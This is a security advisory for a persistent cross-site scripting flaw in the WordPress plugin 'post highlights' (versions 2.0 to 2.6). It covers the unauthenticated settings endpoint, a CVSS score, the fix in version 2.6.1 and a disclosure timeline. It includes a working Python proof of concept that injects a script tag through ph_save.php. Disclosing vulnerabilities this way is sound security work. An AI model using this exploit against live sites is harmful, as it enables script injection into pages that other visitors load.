post highlights 2.0 - 2.6, Persistent XSS
Due to a script having no access protection, and including the ‘wp-load.php’ script, it is possible to update the ‘post highlights’ settings for any post. Using this flaw, you can enable ‘post highlights’ and insert arbitrary HTML content, which will then be output on the page. This output is not filtered or encoded, and as such allows any HTML content to be inserted, such as SCRIPT / IFRAME tags.
Homepage
https://wordpress.org/plugins/post-highlights/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 2.6.1.
Proof of Concept
The following Python script will enable ‘post highlights’ a post with the ID of ‘1’, and set the ‘headline’ field to an arbitrary piece of HTML, which results in a JavaScript alert being fired.
import requests
url = 'http://localhost/wp-content/plugins/post-highlights/ajax/ph_save.php'
payload = {
"action":"highlight",
"id":"1"
}
requests.post(url, data=payload)
payload = {
"action":"headline",
"id":"1",
"txt":"<script>alert('.');</script>"
}
r = requests.post(url, data=payload)Timeline
- 2014-10-09: Discovered
- 2014-10-09: Reported to vendor
- 2014-10-09: CVE requested
- 2014-10-11: CVE assigned
- 2014-10-27: Update requested from vendor
- 2014-11-03: Advisory released
- 2014-11-03: Vendor contacted with intent to fix after release of advisory
- 2014-11-03: Version 2.6.1 released – issue resolved